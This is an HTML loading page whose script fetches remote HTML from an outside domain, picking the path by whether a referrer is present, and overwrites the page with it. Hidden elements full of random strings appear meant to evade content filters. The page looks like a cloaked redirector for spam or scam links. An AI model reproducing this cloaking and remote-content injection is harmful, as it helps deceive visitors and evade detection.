<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .M7G73Rrn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .M7G73Rrn .zjnXCIkCo {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .M7G73Rrn .content {
            line-height: 50px;
            text-align: center
        }

        .M7G73Rrn .img {
            width: 100%
        }

        .M7G73Rrn .TlVsACm {
            text-align: center
        }

        .M7G73Rrn .TlVsACm span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .M7G73Rrn .TlVsACm span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .M7G73Rrn .TlVsACm span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .M7G73Rrn .TlVsACm span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .M7G73Rrn .TlVsACm span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .M7G73Rrn .TlVsACm span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .M7G73Rrn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NqNX044okeED(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Nz6s3Vr = NqNX044okeED('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Nz6s3Vr +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Nz6s3Vr +".html?a=share";
		}
		
        Ls7cpMmzvh=url+"#"+new Date().getTime();
        Ls7cpMmzvh && function() {
            $.get(Ls7cpMmzvh, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>HHWG0pmAKRIHECEXTwCtK1PncCLDyGHxwqVT13n0oba0MnsJFbyzJ9ulbE799cEqZR30nscvoisuZoFC9US5Jlolyhg20v1gO</span>
<div style='display:none'>ppQZh0pqXqBSAn73EdYzT14Cxlz9qFNBO2QR4nWnkMczO2g7w</div>
<span style='display:none'>HHWG0pmAKRIHECEXTwCtK1PncCLDyGHxwqVT13n0oba0MnsJFbyzJ9ulbE799cEqZR30nscvoisuZoFC9US5Jlolyhg20v1gO</span>
<img  src='' style='display:none'>
<p  style='display:none'>dU7pr8P8oNY7M5Oy1jn1PcssxbWRoInvHgk3a3Q33LCAMvkD3EC7SQokemXltng3ykAE7tUDKWtAo4iaLB</p><div class="M7G73Rrn">
    <div class="zjnXCIkCo">
        <div class="TlVsACm">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>eZWdHQqLcaYZfuOp9sA4G78aHqYZjlSigo6tFegeEGkWYcPDHrAUXSj7LKCXanO8yno0GGiDCUzbxeCI3Hx</div>
<li style='display:none' >R8ULcNjeOGNELUV70kvhCDm9YUFjc6Ok7F2VyCTqXyGXQ8WQZ8heY8F0Lknh8iBxVBzLoffhHkW</li>
<h1 style='display:none' >sTtyeYaDYd0vADfymI3YdwshYsrRYgZ9jwi3ZC83</h1>
<span style='display:none'>BeOtVBLWHwV8sJzwsbR5sn</span>
<a  href='#' style='display:none'>moxT1CGFfzwQd29Ece2FQ4kqEouEpHKZAELN8GFZlYk2</a>
<li style='display:none' >R8ULcNjeOGNELUV70kvhCDm9YUFjc6Ok7F2VyCTqXyGXQ8WQZ8heY8F0Lknh8iBxVBzLoffhHkW</li></body>
</html>